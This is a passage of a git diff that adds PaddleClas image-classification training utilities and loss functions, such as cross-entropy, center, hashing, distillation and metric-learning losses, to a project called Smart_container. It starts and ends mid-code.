engine.time_info["reader_cost"].update(time.time() - tic) + if engine.use_dali: + batch = [ + paddle.to_tensor(batch[0]['data']), + paddle.to_tensor(batch[0]['label']) + ] + batch_size = batch[0].shape[0] + if not engine.config["Global"].get("use_multilabel", False): + batch[1] = batch[1].reshape([-1, 1]).astype("int64") + engine.global_step += 1 + + # image input + if engine.amp: + with paddle.amp.auto_cast(custom_black_list={ + "flatten_contiguous_range", "greater_than" + }): + out = forward(engine, batch) + loss_dict = engine.train_loss_func(out, batch[1]) + else: + out = forward(engine, batch) + + # calc loss + if engine.config["DataLoader"]["Train"]["dataset"].get( + "batch_transform_ops", None): + loss_dict = engine.train_loss_func(out, batch[1:]) + else: + loss_dict = engine.train_loss_func(out, batch[1]) + + # step opt and lr + if engine.amp: + scaled = engine.scaler.scale(loss_dict["loss"]) + scaled.backward() + engine.scaler.minimize(engine.optimizer, scaled) + else: + loss_dict["loss"].backward() + engine.optimizer.step() + engine.optimizer.clear_grad() + engine.lr_sch.step() + + # below code just for logging + # update metric_for_logger + update_metric(engine, out, batch, batch_size) + # update_loss_for_logger + update_loss(engine, loss_dict, batch_size) + engine.time_info["batch_cost"].update(time.time() - tic) + if iter_id % print_batch_step == 0: + log_info(engine, batch_size, epoch_id, iter_id) + tic = time.time() + + +def forward(engine, batch): + if not engine.is_rec: + return engine.model(batch[0]) + else: + return engine.model(batch[0], batch[1]) diff --git a/Smart_container/PaddleClas/ppcls/engine/train/utils.py b/Smart_container/PaddleClas/ppcls/engine/train/utils.py new file mode 100644 index 0000000..92eb35d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/engine/train/utils.py @@ -0,0 +1,72 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import, division, print_function + +import datetime +from ppcls.utils import logger +from ppcls.utils.misc import AverageMeter + + +def update_metric(trainer, out, batch, batch_size): + # calc metric + if trainer.train_metric_func is not None: + metric_dict = trainer.train_metric_func(out, batch[-1]) + for key in metric_dict: + if key not in trainer.output_info: + trainer.output_info[key] = AverageMeter(key, '7.5f') + trainer.output_info[key].update(metric_dict[key].numpy()[0], + batch_size) + + +def update_loss(trainer, loss_dict, batch_size): + # update_output_info + for key in loss_dict: + if key not in trainer.output_info: + trainer.output_info[key] = AverageMeter(key, '7.5f') + trainer.output_info[key].update(loss_dict[key].numpy()[0], batch_size) + + +def log_info(trainer, batch_size, epoch_id, iter_id): + lr_msg = "lr: {:.5f}".format(trainer.lr_sch.get_lr()) + metric_msg = ", ".join([ + "{}: {:.5f}".format(key, trainer.output_info[key].avg) + for key in trainer.output_info + ]) + time_msg = "s, ".join([ + "{}: {:.5f}".format(key, trainer.time_info[key].avg) + for key in trainer.time_info + ]) + + ips_msg = "ips: {:.5f} images/sec".format( + batch_size / trainer.time_info["batch_cost"].avg) + eta_sec = ((trainer.config["Global"]["epochs"] - epoch_id + 1 + ) * len(trainer.train_dataloader) - iter_id + ) * trainer.time_info["batch_cost"].avg + eta_msg = "eta: {:s}".format(str(datetime.timedelta(seconds=int(eta_sec)))) + logger.info("[Train][Epoch {}/{}][Iter: {}/{}]{}, {}, {}, {}, {}".format( + epoch_id, trainer.config["Global"]["epochs"], iter_id, + len(trainer.train_dataloader), lr_msg, metric_msg, time_msg, ips_msg, + eta_msg)) + + logger.scaler( + name="lr", + value=trainer.lr_sch.get_lr(), + step=trainer.global_step, + writer=trainer.vdl_writer) + for key in trainer.output_info: + logger.scaler( + name="train_{}".format(key), + value=trainer.output_info[key].avg, + step=trainer.global_step, + writer=trainer.vdl_writer) diff --git a/Smart_container/PaddleClas/ppcls/loss/__init__.py b/Smart_container/PaddleClas/ppcls/loss/__init__.py new file mode 100644 index 0000000..7c03748 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/__init__.py @@ -0,0 +1,57 @@ +import copy + +import paddle +import paddle.nn as nn +from ppcls.utils import logger + +from .celoss import CELoss, MixCELoss +from .googlenetloss import GoogLeNetLoss +from .centerloss import CenterLoss +from .emlloss import EmlLoss +from .msmloss import MSMLoss +from .npairsloss import NpairsLoss +from .trihardloss import TriHardLoss +from .triplet import TripletLoss, TripletLossV2 +from .supconloss import SupConLoss +from .pairwisecosface import PairwiseCosface +from .dmlloss import DMLLoss +from .distanceloss import DistanceLoss + +from .distillationloss import DistillationCELoss +from .distillationloss import DistillationGTCELoss +from .distillationloss import DistillationDMLLoss +from .multilabelloss import MultiLabelLoss + + +class CombinedLoss(nn.Layer): + def __init__(self, config_list): + super().__init__() + self.loss_func = [] + self.loss_weight = [] + assert isinstance(config_list, list), ( + 'operator config should be a list') + for config in config_list: + assert isinstance(config, + dict) and len(config) == 1, "yaml format error" + name = list(config)[0] + param = config[name] + assert "weight" in param, "weight must be in param, but param just contains {}".format( + param.keys()) + self.loss_weight.append(param.pop("weight")) + self.loss_func.append(eval(name)(**param)) + + def __call__(self, input, batch): + loss_dict = {} + for idx, loss_func in enumerate(self.loss_func): + loss = loss_func(input, batch) + weight = self.loss_weight[idx] + loss = {key: loss[key] * weight for key in loss} + loss_dict.update(loss) + loss_dict["loss"] = paddle.add_n(list(loss_dict.values())) + return loss_dict + + +def build_loss(config): + module_class = CombinedLoss(copy.deepcopy(config)) + logger.debug("build loss {} success.".format(module_class)) + return module_class diff --git a/Smart_container/PaddleClas/ppcls/loss/celoss.py b/Smart_container/PaddleClas/ppcls/loss/celoss.py new file mode 100644 index 0000000..ff19bf9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/celoss.py @@ -0,0 +1,74 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class CELoss(nn.Layer): + """ + Cross entropy loss + """ + + def __init__(self, epsilon=None): + super().__init__() + if epsilon is not None and (epsilon <= 0 or epsilon >= 1): + epsilon = None + self.epsilon = epsilon + + def _labelsmoothing(self, target, class_num): + if len(target.shape) == 1 or target.shape[-1] != class_num: + one_hot_target = F.one_hot(target, class_num) + else: + one_hot_target = target + soft_target = F.label_smooth(one_hot_target, epsilon=self.epsilon) + soft_target = paddle.reshape(soft_target, shape=[-1, class_num]) + return soft_target + + def forward(self, x, label): + if isinstance(x, dict): + x = x["logits"] + if self.epsilon is not None: + class_num = x.shape[-1] + label = self._labelsmoothing(label, class_num) + x = -F.log_softmax(x, axis=-1) + loss = paddle.sum(x * label, axis=-1) + else: + if label.shape[-1] == x.shape[-1]: + label = F.softmax(label, axis=-1) + soft_label = True + else: + soft_label = False + loss = F.cross_entropy(x, label=label, soft_label=soft_label) + loss = loss.mean() + return {"CELoss": loss} + + +class MixCELoss(CELoss): + """ + Cross entropy loss with mix(mixup, cutmix, fixmix) + """ + + def __init__(self, epsilon=None): + super().__init__() + self.epsilon = epsilon + + def __call__(self, input, batch): + target0, target1, lam = batch + loss0 = super().forward(input, target0)["CELoss"] + loss1 = super().forward(input, target1)["CELoss"] + loss = lam * loss0 + (1.0 - lam) * loss1 + loss = paddle.mean(loss) + return {"MixCELoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/centerloss.py b/Smart_container/PaddleClas/ppcls/loss/centerloss.py new file mode 100644 index 0000000..d85b3f2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/centerloss.py @@ -0,0 +1,54 @@ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class CenterLoss(nn.Layer): + def __init__(self, num_classes=5013, feat_dim=2048): + super(CenterLoss, self).__init__() + self.num_classes = num_classes + self.feat_dim = feat_dim + self.centers = paddle.randn( + shape=[self.num_classes, self.feat_dim]).astype( + "float64") #random center + + def __call__(self, input, target): + """ + inputs: network output: {"features: xxx", "logits": xxxx} + target: image label + """ + feats = input["features"] + labels = target + batch_size = feats.shape[0] + + #calc feat * feat + dist1 = paddle.sum(paddle.square(feats), axis=1, keepdim=True) + dist1 = paddle.expand(dist1, [batch_size, self.num_classes]) + + #dist2 of centers + dist2 = paddle.sum(paddle.square(self.centers), axis=1, + keepdim=True) #num_classes + dist2 = paddle.expand(dist2, + [self.num_classes, batch_size]).astype("float64") + dist2 = paddle.transpose(dist2, [1, 0]) + + #first x * x + y * y + distmat = paddle.add(dist1, dist2) + tmp = paddle.matmul(feats, paddle.transpose(self.centers, [1, 0])) + distmat = distmat - 2.0 * tmp + + #generate the mask + classes = paddle.arange(self.num_classes).astype("int64") + labels = paddle.expand( + paddle.unsqueeze(labels, 1), (batch_size, self.num_classes)) + mask = paddle.equal( + paddle.expand(classes, [batch_size, self.num_classes]), + labels).astype("float64") #get mask + + dist = paddle.multiply(distmat, mask) + loss = paddle.sum(paddle.clip(dist, min=1e-12, max=1e+12)) / batch_size + + return {'CenterLoss': loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/comfunc.py b/Smart_container/PaddleClas/ppcls/loss/comfunc.py new file mode 100644 index 0000000..277bdd6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/comfunc.py @@ -0,0 +1,45 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np + + +def rerange_index(batch_size, samples_each_class): + tmp = np.arange(0, batch_size * batch_size) + tmp = tmp.reshape(-1, batch_size) + rerange_index = [] + + for i in range(batch_size): + step = i // samples_each_class + start = step * samples_each_class + end = (step + 1) * samples_each_class + + pos_idx = [] + neg_idx = [] + for j, k in enumerate(tmp[i]): + if j >= start and j < end: + if j == i: + pos_idx.insert(0, k) + else: + pos_idx.append(k) + else: + neg_idx.append(k) + rerange_index += (pos_idx + neg_idx) + + rerange_index = np.array(rerange_index).astype(np.int32) + return rerange_index diff --git a/Smart_container/PaddleClas/ppcls/loss/deephashloss.py b/Smart_container/PaddleClas/ppcls/loss/deephashloss.py new file mode 100644 index 0000000..44c08ef --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/deephashloss.py @@ -0,0 +1,90 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. + +import paddle +import paddle.nn as nn + +class DSHSDLoss(nn.Layer): + """ + # DSHSD(IEEE ACCESS 2019) + # paper [Deep Supervised Hashing Based on Stable Distribution](https://ieeexplore.ieee.org/document/8648432/) + # [DSHSD] epoch:70, bit:48, dataset:cifar10-1, MAP:0.809, Best MAP: 0.809 + # [DSHSD] epoch:250, bit:48, dataset:nuswide_21, MAP:0.809, Best MAP: 0.815 + # [DSHSD] epoch:135, bit:48, dataset:imagenet, MAP:0.647, Best MAP: 0.647 + """ + def __init__(self, n_class, bit, alpha, multi_label=False): + super(DSHSDLoss, self).__init__() + self.m = 2 * bit + self.alpha = alpha + self.multi_label = multi_label + self.n_class = n_class + self.fc = paddle.nn.Linear(bit, n_class, bias_attr=False) + + def forward(self, input, label): + feature = input["features"] + feature = feature.tanh().astype("float32") + + dist = paddle.sum( + paddle.square((paddle.unsqueeze(feature, 1) - paddle.unsqueeze(feature, 0))), + axis=2) + + # label to ont-hot + label = paddle.flatten(label) + label = paddle.nn.functional.one_hot(label, self.n_class).astype("float32") + + s = (paddle.matmul(label, label, transpose_y=True) == 0).astype("float32") + Ld = (1 - s) / 2 * dist + s / 2 * (self.m - dist).clip(min=0) + Ld = Ld.mean() + + logits = self.fc(feature) + if self.multi_label: + # multiple labels classification loss + Lc = (logits - label * logits + ((1 + (-logits).exp()).log())).sum(axis=1).mean() + else: + # single labels classification loss + Lc = (-paddle.nn.functional.softmax(logits).log() * label).sum(axis=1).mean() + + return {"dshsdloss": Lc + Ld * self.alpha} + +class LCDSHLoss(nn.Layer): + """ + # paper [Locality-Constrained Deep Supervised Hashing for Image Retrieval](https://www.ijcai.org/Proceedings/2017/0499.pdf) + # [LCDSH] epoch:145, bit:48, dataset:cifar10-1, MAP:0.798, Best MAP: 0.798 + # [LCDSH] epoch:183, bit:48, dataset:nuswide_21, MAP:0.833, Best MAP: 0.834 + """ + def __init__(self, n_class, _lambda): + super(LCDSHLoss, self).__init__() + self._lambda = _lambda + self.n_class = n_class + + def forward(self, input, label): + feature = input["features"] + + # label to ont-hot + label = paddle.flatten(label) + label = paddle.nn.functional.one_hot(label, self.n_class).astype("float32") + + s = 2 * (paddle.matmul(label, label, transpose_y=True) > 0).astype("float32") - 1 + inner_product = paddle.matmul(feature, feature, transpose_y=True) * 0.5 + + inner_product = inner_product.clip(min=-50, max=50) + L1 = paddle.log(1 + paddle.exp(-s * inner_product)).mean() + + b = feature.sign() + inner_product_ = paddle.matmul(b, b, transpose_y=True) * 0.5 + sigmoid = paddle.nn.Sigmoid() + L2 = (sigmoid(inner_product) - sigmoid(inner_product_)).pow(2).mean() + + return {"lcdshloss": L1 + self._lambda * L2} + diff --git a/Smart_container/PaddleClas/ppcls/loss/distanceloss.py b/Smart_container/PaddleClas/ppcls/loss/distanceloss.py new file mode 100644 index 0000000..0a09f0c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/distanceloss.py @@ -0,0 +1,43 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + +from paddle.nn import L1Loss +from paddle.nn import MSELoss as L2Loss +from paddle.nn import SmoothL1Loss + + +class DistanceLoss(nn.Layer): + """ + DistanceLoss: + mode: loss mode + """ + + def __init__(self, mode="l2", **kargs): + super().__init__() + assert mode in ["l1", "l2", "smooth_l1"] + if mode == "l1": + self.loss_func = nn.L1Loss(**kargs) + elif mode == "l2": + self.loss_func = nn.MSELoss(**kargs) + elif mode == "smooth_l1": + self.loss_func = nn.SmoothL1Loss(**kargs) + self.mode = mode + + def forward(self, x, y): + loss = self.loss_func(x, y) + return {"loss_{}".format(self.mode): loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/distillationloss.py b/Smart_container/PaddleClas/ppcls/loss/distillationloss.py new file mode 100644 index 0000000..54dc601 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/distillationloss.py @@ -0,0 +1,141 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. + +import paddle +import paddle.nn as nn + +from .celoss import CELoss +from .dmlloss import DMLLoss +from .distanceloss import DistanceLoss + + +class DistillationCELoss(CELoss): + """ + DistillationCELoss + """ + + def __init__(self, + model_name_pairs=[], + epsilon=None, + key=None, + name="loss_ce"): + super().__init__(epsilon=epsilon) + assert isinstance(model_name_pairs, list) + self.key = key + self.model_name_pairs = model_name_pairs + self.name = name + + def forward(self, predicts, batch): + loss_dict = dict() + for idx, pair in enumerate(self.model_name_pairs): + out1 = predicts[pair[0]] + out2 = predicts[pair[1]] + if self.key is not None: + out1 = out1[self.key] + out2 = out2[self.key] + loss = super().forward(out1, out2) + for key in loss: + loss_dict["{}_{}_{}".format(key, pair[0], pair[1])] = loss[key] + return loss_dict + + +class DistillationGTCELoss(CELoss): + """ + DistillationGTCELoss + """ + + def __init__(self, + model_names=[], + epsilon=None, + key=None, + name="loss_gt_ce"): + super().__init__(epsilon=epsilon) + assert isinstance(model_names, list) + self.key = key + self.model_names = model_names + self.name = name + + def forward(self, predicts, batch): + loss_dict = dict() + for idx, name in enumerate(self.model_names): + out = predicts[name] + if self.key is not None: + out = out[self.key] + loss = super().forward(out, batch) + for key in loss: + loss_dict["{}_{}".format(key, name)] = loss[key] + return loss_dict + + +class DistillationDMLLoss(DMLLoss): + """ + """ + + def __init__(self, + model_name_pairs=[], + act=None, + key=None, + name="loss_dml"): + super().__init__(act=act) + assert isinstance(model_name_pairs, list) + self.key = key + self.model_name_pairs = model_name_pairs + self.name = name + + def forward(self, predicts, batch): + loss_dict = dict() + for idx, pair in enumerate(self.model_name_pairs): + out1 = predicts[pair[0]] + out2 = predicts[pair[1]] + if self.key is not None: + out1 = out1[self.key] + out2 = out2[self.key] + loss = super().forward(out1, out2) + if isinstance(loss, dict): + for key in loss: + loss_dict["{}_{}_{}_{}".format(key, pair[0], pair[1], + idx)] = loss[key] + else: + loss_dict["{}_{}".format(self.name, idx)] = loss + return loss_dict + + +class DistillationDistanceLoss(DistanceLoss): + """ + """ + + def __init__(self, + mode="l2", + model_name_pairs=[], + key=None, + name="loss_", + **kargs): + super().__init__(mode=mode, **kargs) + assert isinstance(model_name_pairs, list) + self.key = key + self.model_name_pairs = model_name_pairs + self.name = name + "_l2" + + def forward(self, predicts, batch): + loss_dict = dict() + for idx, pair in enumerate(self.model_name_pairs): + out1 = predicts[pair[0]] + out2 = predicts[pair[1]] + if self.key is not None: + out1 = out1[self.key] + out2 = out2[self.key] + loss = super().forward(out1, out2) + for key in loss: + loss_dict["{}_{}_{}".format(self.name, key, idx)] = loss[key] + return loss_dict diff --git a/Smart_container/PaddleClas/ppcls/loss/dmlloss.py b/Smart_container/PaddleClas/ppcls/loss/dmlloss.py new file mode 100644 index 0000000..d8bb833 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/dmlloss.py @@ -0,0 +1,46 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class DMLLoss(nn.Layer): + """ + DMLLoss + """ + + def __init__(self, act="softmax"): + super().__init__() + if act is not None: + assert act in ["softmax", "sigmoid"] + if act == "softmax": + self.act = nn.Softmax(axis=-1) + elif act == "sigmoid": + self.act = nn.Sigmoid() + else: + self.act = None + + def forward(self, out1, out2): + if self.act is not None: + out1 = self.act(out1) + out2 = self.act(out2) + + log_out1 = paddle.log(out1) + log_out2 = paddle.log(out2) + loss = (F.kl_div( + log_out1, out2, reduction='batchmean') + F.kl_div( + log_out2, out1, reduction='batchmean')) / 2.0 + return {"DMLLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/emlloss.py b/Smart_container/PaddleClas/ppcls/loss/emlloss.py new file mode 100644 index 0000000..9735703 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/emlloss.py @@ -0,0 +1,97 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import math +import paddle +import numpy as np +from .comfunc import rerange_index + + +class EmlLoss(paddle.nn.Layer): + def __init__(self, batch_size=40, samples_each_class=2): + super(EmlLoss, self).__init__() + assert (batch_size % samples_each_class == 0) + self.samples_each_class = samples_each_class + self.batch_size = batch_size + self.rerange_index = rerange_index(batch_size, samples_each_class) + self.thresh = 20.0 + self.beta = 100000 + + def surrogate_function(self, beta, theta, bias): + x = theta * paddle.exp(bias) + output = paddle.log(1 + beta * x) / math.log(1 + beta) + return output + + def surrogate_function_approximate(self, beta, theta, bias): + output = ( + paddle.log(theta) + bias + math.log(beta)) / math.log(1 + beta) + return output + + def surrogate_function_stable(self, beta, theta, target, thresh): + max_gap = paddle.to_tensor(thresh, dtype='float32') + max_gap.stop_gradient = True + + target_max = paddle.maximum(target, max_gap) + target_min = paddle.minimum(target, max_gap) + + loss1 = self.surrogate_function(beta, theta, target_min) + loss2 = self.surrogate_function_approximate(beta, theta, target_max) + bias = self.surrogate_function(beta, theta, max_gap) + loss = loss1 + loss2 - bias + return loss + + def forward(self, input, target=None): + features = input["features"] + samples_each_class = self.samples_each_class + batch_size = self.batch_size + rerange_index = self.rerange_index + + #calc distance + diffs = paddle.unsqueeze( + features, axis=1) - paddle.unsqueeze( + features, axis=0) + similary_matrix = paddle.sum(paddle.square(diffs), axis=-1) + + tmp = paddle.reshape(similary_matrix, shape=[-1, 1]) + rerange_index = paddle.to_tensor(rerange_index) + tmp = paddle.gather(tmp, index=rerange_index) + similary_matrix = paddle.reshape(tmp, shape=[-1, batch_size]) + + ignore, pos, neg = paddle.split( + similary_matrix, + num_or_sections=[ + 1, samples_each_class - 1, batch_size - samples_each_class + ], + axis=1) + ignore.stop_gradient = True + + pos_max = paddle.max(pos, axis=1, keepdim=True) + pos = paddle.exp(pos - pos_max) + pos_mean = paddle.mean(pos, axis=1, keepdim=True) + + neg_min = paddle.min(neg, axis=1, keepdim=True) + neg = paddle.exp(neg_min - neg) + neg_mean = paddle.mean(neg, axis=1, keepdim=True) + + bias = pos_max - neg_min + theta = paddle.multiply(neg_mean, pos_mean) + + loss = self.surrogate_function_stable(self.beta, theta, bias, + self.thresh) + loss = paddle.mean(loss) + return {"emlloss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/googlenetloss.py b/Smart_container/PaddleClas/ppcls/loss/googlenetloss.py new file mode 100644 index 0000000..c580aa6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/googlenetloss.py @@ -0,0 +1,41 @@ +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class GoogLeNetLoss(nn.Layer): + """ + Cross entropy loss used after googlenet + """ + def __init__(self, epsilon=None): + super().__init__() + assert (epsilon is None or epsilon <= 0 or epsilon >= 1), "googlenet is not support label_smooth" + + + def forward(self, inputs, label): + input0, input1, input2 = inputs + if isinstance(input0, dict): + input0 = input0["logits"] + if isinstance(input1, dict): + input1 = input1["logits"] + if isinstance(input2, dict): + input2 = input2["logits"] + + loss0 = F.cross_entropy(input0, label=label, soft_label=False) + loss1 = F.cross_entropy(input1, label=label, soft_label=False) + loss2 = F.cross_entropy(input2, label=label, soft_label=False) + loss = loss0 + 0.3 * loss1 + 0.3 * loss2 + loss = loss.mean() + return {"GooleNetLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/msmloss.py b/Smart_container/PaddleClas/ppcls/loss/msmloss.py new file mode 100644 index 0000000..3aa0dd8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/msmloss.py @@ -0,0 +1,78 @@ +# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import paddle +from .comfunc import rerange_index + + +class MSMLoss(paddle.nn.Layer): + """ + MSMLoss Loss, based on triplet loss. USE P * K samples. + the batch size is fixed. Batch_size = P * K; but the K may vary between batches. + same label gather together + + supported_metrics = [ + 'euclidean', + 'sqeuclidean', + 'cityblock', + ] + only consider samples_each_class = 2 + """ + + def __init__(self, batch_size=120, samples_each_class=2, margin=0.1): + super(MSMLoss, self).__init__() + self.margin = margin + self.samples_each_class = samples_each_class + self.batch_size = batch_size + self.rerange_index = rerange_index(batch_size, samples_each_class) + + def forward(self, input, target=None): + #normalization + features = input["features"] + features = self._nomalize(features) + samples_each_class = self.samples_each_class + rerange_index = paddle.to_tensor(self.rerange_index) + + #calc sm + diffs = paddle.unsqueeze( + features, axis=1) - paddle.unsqueeze( + features, axis=0) + similary_matrix = paddle.sum(paddle.square(diffs), axis=-1) + + #rerange + tmp = paddle.reshape(similary_matrix, shape=[-1, 1]) + tmp = paddle.gather(tmp, index=rerange_index) + similary_matrix = paddle.reshape(tmp, shape=[-1, self.batch_size]) + + #split + ignore, pos, neg = paddle.split( + similary_matrix, + num_or_sections=[1, samples_each_class - 1, -1], + axis=1) + ignore.stop_gradient = True + + hard_pos = paddle.max(pos) + hard_neg = paddle.min(neg) + + loss = hard_pos + self.margin - hard_neg + loss = paddle.nn.ReLU()(loss) + return {"msmloss": loss} + + def _nomalize(self, input): + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + return paddle.divide(input, input_norm) diff --git a/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py b/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py new file mode 100644 index 0000000..d30d5b8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/multilabelloss.py @@ -0,0 +1,43 @@ +import paddle +import paddle.nn as nn +import paddle.nn.functional as F + + +class MultiLabelLoss(nn.Layer): + """ + Multi-label loss + """ + + def __init__(self, epsilon=None): + super().__init__() + if epsilon is not None and (epsilon <= 0 or epsilon >= 1): + epsilon = None + self.epsilon = epsilon + + def _labelsmoothing(self, target, class_num): + if target.ndim == 1 or target.shape[-1] != class_num: + one_hot_target = F.one_hot(target, class_num) + else: + one_hot_target = target + soft_target = F.label_smooth(one_hot_target, epsilon=self.epsilon) + soft_target = paddle.reshape(soft_target, shape=[-1, class_num]) + return soft_target + + def _binary_crossentropy(self, input, target, class_num): + if self.epsilon is not None: + target = self._labelsmoothing(target, class_num) + cost = F.binary_cross_entropy_with_logits( + logit=input, label=target) + else: + cost = F.binary_cross_entropy_with_logits( + logit=input, label=target) + + return cost + + def forward(self, x, target): + if isinstance(x, dict): + x = x["logits"] + class_num = x.shape[-1] + loss = self._binary_crossentropy(x, target, class_num) + loss = loss.mean() + return {"MultiLabelLoss": loss} diff --git a/Smart_container/PaddleClas/ppcls/loss/npairsloss.py b/Smart_container/PaddleClas/ppcls/loss/npairsloss.py new file mode 100644 index 0000000..d4b359e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/loss/npairsloss.py @@ -0,0 +1,38 @@ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +import paddle + + +class NpairsLoss(paddle.nn.Layer): + def __init__(self, reg_lambda=0.01): + super(NpairsLoss, self).__init__() + self.reg_lambda = reg_lambda + + def forward(self, input, target=None): + """ + anchor and positive(should include label) + """ + features = input["features"] + reg_lambda = self.reg_lambda + batch_size = features.shape[0] + fea_dim = features.shape[1] + num_class = batch_size // 2 + + #reshape + out_feas = paddle.reshape(features, shape=[-1, 2, fea_dim]) + anc_feas, pos_feas = paddle.split(out_feas, num_or_sections=2, axis=1) + anc_feas = paddle.squeeze(anc_feas, axis=1) + pos_feas = paddle.squeeze(pos_feas, axis=1) + + #get simi matrix + similarity_matrix = paddle.matmul( + anc_feas, pos_feas, transpose_y=True) #get similarity matrix + sparse_labels = paddle.arange(0, num_class, dtype='int64') + xentloss = paddle.nn.CrossEntropyLoss()( + similarity_matrix, sparse_labels) #by default: mean + + #l2 norm + reg = 